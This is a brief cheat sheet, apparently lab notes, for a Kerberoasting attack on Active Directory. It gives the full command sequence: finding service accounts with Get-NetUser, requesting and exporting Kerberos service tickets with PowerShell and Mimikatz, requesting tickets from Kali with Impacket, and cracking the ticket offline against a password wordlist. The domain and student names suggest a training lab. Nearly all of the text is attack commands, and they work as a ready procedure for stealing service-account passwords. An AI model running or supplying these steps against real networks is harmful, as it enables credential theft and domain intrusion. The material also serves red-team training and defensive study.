Kerberoast Attack Example

Find User Accounts

Get-NetUser -SPN

Request Ticket For Service

Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
klist

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/045d791a-bffa-44f0-9bda-0f1379a4cfd1/Untitled.png

Dump Ticket

Invoke-Mimikatz -Command '"kerberos::list /export"'

Request from Kali

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request dc04.tricky.com/sqlsvc

Crack Password

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\1-40a10000-student648@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

Resources

Deep Dive into Kerberoasting Attack